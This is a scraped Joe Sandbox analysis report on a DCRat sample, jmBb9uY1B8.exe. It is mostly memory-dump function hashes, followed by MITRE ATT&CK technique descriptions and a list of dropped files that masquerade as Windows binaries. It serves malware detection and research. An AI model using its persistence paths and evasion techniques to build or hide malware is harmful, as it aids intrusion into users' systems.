Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c407519f63e545b58140242c422b9c668348f5b9290701cd77317ab0dc5bd6ba
Instruction ID: 533a90015187b09196486998881ba3c5e3441dbabc23708e18a27feb44005001
Opcode Fuzzy Hash: c407519f63e545b58140242c422b9c668348f5b9290701cd77317ab0dc5bd6ba
Instruction Fuzzy Hash: 2A110439B0E79E8FD719EB68EC291F97BA0FF46221F4502BBD508C71B2DA241604C790

Function 00007FFD9B7F0E61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7f0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2d773e862858786c27f9b619a00ba12140556ec2087f9d99528d7a42ec8d38
Instruction ID: 03fa9516d711521e691350e1a5c7e3727913ce8f975a43fb7bdbb7b940d4992d
Opcode Fuzzy Hash: ff2d773e862858786c27f9b619a00ba12140556ec2087f9d99528d7a42ec8d38
Instruction Fuzzy Hash: 3B118E70E0A64E8FEBA5EF64C8686BD7BE1FF19300F0105BAD41AC62B1DB35A650C740

Function 00007FFD9B7ECA50 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1fe29bf235066e1bb28c2b5e8b82375b956c7fa00301f0cf0dd363a10a80196
Instruction ID: 969fd97acf126063a071c881853d004116aa081a10281e8c54b2586dc6c3b3ad
Opcode Fuzzy Hash: a1fe29bf235066e1bb28c2b5e8b82375b956c7fa00301f0cf0dd363a10a80196
Instruction Fuzzy Hash: 08118234A0D78E8FDB56EB7888695B97BB0FF19304F0105BBD419C71B2DA345640C750

Function 00007FFD9B7E1140 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77c5656b5e31530022de2e0285d801d601983179ff8e1f70e812072f836f0b8
Instruction ID: 3662f187c08f0301d37186b3c001a57f64c1fc2552c126a858981d742ed6893a
Opcode Fuzzy Hash: a77c5656b5e31530022de2e0285d801d601983179ff8e1f70e812072f836f0b8
Instruction Fuzzy Hash: CA11E570E0960E8AEB68EBA8C4697BE77E0FF59304F00057EE41AD65F1DE356650C740

Function 00007FFD9B7EC189 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb274984723a4a0f164f0346e9a25235cdefb26b4975152af579cd6efcb052c
Instruction ID: 855f8c1f8a77decd88275ae311b7cb8e2169b586622f5f3720c90d28ef0be75d
Opcode Fuzzy Hash: 8eb274984723a4a0f164f0346e9a25235cdefb26b4975152af579cd6efcb052c
Instruction Fuzzy Hash: 64117C70A1974E8FDB55EF64C8686BD7BB0FF19304F4105BAE419C61B2DA34A640C700

Function 00007FFD9B7E3525 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction ID: 63637bb70d3c710627f34776ef36b309318adab8ff1c568c6ed60ab475bbecdc
Opcode Fuzzy Hash: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction Fuzzy Hash: 74113970E1964E8FDB55EFA8C4696BA77A0FF18304F4205BED41AC62B1DA34A640C710

Function 00007FFD9B7E05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction ID: 25aa7b04738fa33a719f09687289ac213e09c4bd3eaceced5f0943b2df980e6b
Opcode Fuzzy Hash: 32be394e09575a0a00ef009f4514928b28b6409a757ec7830cec2672da1e4085
Instruction Fuzzy Hash: 92018030A0560E8EDB59EF64C4666B977A1EF58304F51057AD41EC65F4CA31A650C740

Function 00007FFD9B7EAA79 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2c2cfd894d8db4d0cff3487d6abe68da3ca71c7731d133e1b15b08e52959eb
Instruction ID: 7f5b5d75eea9d33b2d6dd53d1ec937ff16b1d2067944d73ee0d2177f3cf142bf
Opcode Fuzzy Hash: ad2c2cfd894d8db4d0cff3487d6abe68da3ca71c7731d133e1b15b08e52959eb
Instruction Fuzzy Hash: 84018C30A1E78E8FDB55EF64C4695B97BA0EF09304F4605BED40ACA1F2DA39A940C701

Function 00007FFD9B7EBD4C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e710a37f65036f1244c53fefb131ba24d155b9f8dd724aa311babaffccda694
Instruction ID: 6667619ffddb07774f6e6f0ce204ddf95eb65c09beac60f4e4ad4f384bf3529b
Opcode Fuzzy Hash: 5e710a37f65036f1244c53fefb131ba24d155b9f8dd724aa311babaffccda694
Instruction Fuzzy Hash: 01014030A19A4E8EEB94EF68C4A82BD7BE0FF18305F51057AD41AC61B1DA75A650C740

Function 00007FFD9B7E283D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction ID: 25a6e0480d79e78e869b771d7ae76cb00f610704efb9557c5802c561e5ae1437
Opcode Fuzzy Hash: 34bb7115745c1a909c405dec199fbc0d5d0a0d036a64e767f7f2ca160b8a42d1
Instruction Fuzzy Hash: A5018F30E5A64E8FE755EBA488585B977F0EF19300F4245B6D418C70B6EE38E694C710

Function 00007FFD9B7E1C65 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction ID: 31f1bdfa9c0a2ddb257b8ea257b368e4945cb54eea1f8d557c9831de81bef7b7
Opcode Fuzzy Hash: 638f3c526abc75e34aec68150c5f7f8f202ba7d3a07ee65ada818bb51870766f
Instruction Fuzzy Hash: 2A018130A0A64E8FDB559F5484666BA37A0FF55304F51057AE80DC65F1CB35A950C740

Function 00007FFD9B7EABD9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e326b90ad9c300691f849dc44160103540ed18f469ad75739944fffd0dee31
Instruction ID: 6a7a72f5846a540a11e2543a85c66d4b801119425fb12cbbe6eb4cd01c8fa148
Opcode Fuzzy Hash: 58e326b90ad9c300691f849dc44160103540ed18f469ad75739944fffd0dee31
Instruction Fuzzy Hash: 95014431E5E74E4FE762AB7488695A97BE0EF15300F464AF7D409C70F6EA28A5448701

Function 00007FFD9B7E343C Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction ID: eaba69e175634c88b8d1d55229e42f2473be5355c776f71dc63330ad0d90f8ec
Opcode Fuzzy Hash: 06d3d38017be86a6b41d0c0c91a4df62b940982261c1af49e792d06491f63c83
Instruction Fuzzy Hash: 89014F71E09A0E8EEB52FF6884585B97BE0FF19301F0209B6D419D7075EA34A6448750

Function 00007FFD9B7E0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction ID: 35591fc9d73d6cd682e85b2953707cd4c13841da19703e382e5a965825042109
Opcode Fuzzy Hash: dae888ef5f55f8eabebd296b8d2bd0fb0bce4bdb410b67c70401d93f58a8c51b
Instruction Fuzzy Hash: 9701D130A1560E8AEB68EFB4C4686BD37A0FF18305F51097ED41ED21F4DE35B280CA00

Function 00007FFD9B7E0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction ID: 07ddd71c09420b1d25e8c764e9bf39776b4d5a33b5a588256e8d4c5308ab11c5
Opcode Fuzzy Hash: 2af7bc151857e6c34cd76c13440836597404ea7c2b50baf4c19a642419b697e1
Instruction Fuzzy Hash: 0A016D30A1960E9AEB68EBA4C4696B973E0FF18309F51097ED41ED21F5DE35A650C600

Function 00007FFD9B7EBA3B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2da3e9ad4928093581c1d8345fd2e9ce9682ad5d3426c34f12e48662a42c9a6
Instruction ID: 14750dfc8a7d361a902d6a4c55e79f7b8e57359933da1a5598c33ec7a9d270e1
Opcode Fuzzy Hash: b2da3e9ad4928093581c1d8345fd2e9ce9682ad5d3426c34f12e48662a42c9a6
Instruction Fuzzy Hash: AE010070E0961E8EDF61DBA4C494AFDBBB0AF18301F114676D009D62B5DA38A684CB94

Function 00007FFD9B7E05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction ID: fc8f02f6c411fe655d40531ebf536a0247cca477e6282e85d34de133c0b854ba
Opcode Fuzzy Hash: b63bfe3aa7712dd5101bf6e8dcca5b48fc8af9ea8da4a6f12d9ff6386094d55e
Instruction Fuzzy Hash: 9EF0C230E0A64E8FEB65EF6494666FA37A0EF45308F51057AE80EC25F1CE35A6A0C740

Function 00007FFD9B7E2759 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction ID: def44d4317b2ebeb4cd9e3fc4ee67102d1f6c485a3f73b0b5a515a2be03ca793
Opcode Fuzzy Hash: f67025375cd92de7786e3f090a60a3644d5019bed9d5af085d255d4c91786e20
Instruction Fuzzy Hash: 9CF09631A0E38D8FDB6A9F7488652A93F70FF06304F4605BAD419C61F2DB38A554CB41

Function 00007FFD9B7E27CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction ID: ec771d4a23cb0f74c6488ea950f464b6fcf91c7ea2a6678629186a58ff849c46
Opcode Fuzzy Hash: 9a1f2b38b3b63c775262b2bca70cc1b6e9762af3a28673a9177ca5841d55c56b
Instruction Fuzzy Hash: 27F09031A0E78E8FEB699FA488291B97BE0FF55308F4205BAD409C60F6DB399554C741

Function 00007FFD9B7EEE08 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd2d64e33fe575d3af9881bd38121e0db396342fbf33c886a96229cdf0d5a82
Instruction ID: cb7983c0423af42474219311983c269cd21beb89b409f6b30d060d797368931c
Opcode Fuzzy Hash: fcd2d64e33fe575d3af9881bd38121e0db396342fbf33c886a96229cdf0d5a82
Instruction Fuzzy Hash: BE01C074E4562D8BEBA4DB54C8A47ADB6B1AF58301F1106FAD04EA72B5CB341E808F54

Function 00007FFD9B7E0F49 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1860372993.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65883635f79ad949f5a26d67c8ece31f41560cacf1d00b94ff261eea54f3bdb
Instruction ID: 71524a475f543f0a047936769b50144ab85e6ddc6a0ce540dcd6f8da515413e4
Opcode Fuzzy Hash: d65883635f79ad949f5a26d67c8ece31f41560cacf1d00b94ff261eea54f3bdb
Instruction Fuzzy Hash: 6DF01230A0950ECAEB64DB44C861BEE77B1EF94301F1102B5C009972B5DE746A858B90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jmBb9uY1B8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Internet Explorer\en-GB\0b15d056fd0733

C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe:Zone.Identifier

C:\Program Files (x86)\jDownloader\55b276f4edf653

C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe

C:\Program Files (x86)\jDownloader\StartMenuExperienceHost.exe:Zone.Identifier

C:\ProgramData\66fc9ff0ee96c2

C:\ProgramData\sihost.exe

C:\ProgramData\sihost.exe:Zone.Identifier

C:\Recovery\0b15d056fd0733

C:\Recovery\9e8d7a4ca61bd9

Windows Analysis Report
jmBb9uY1B8.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
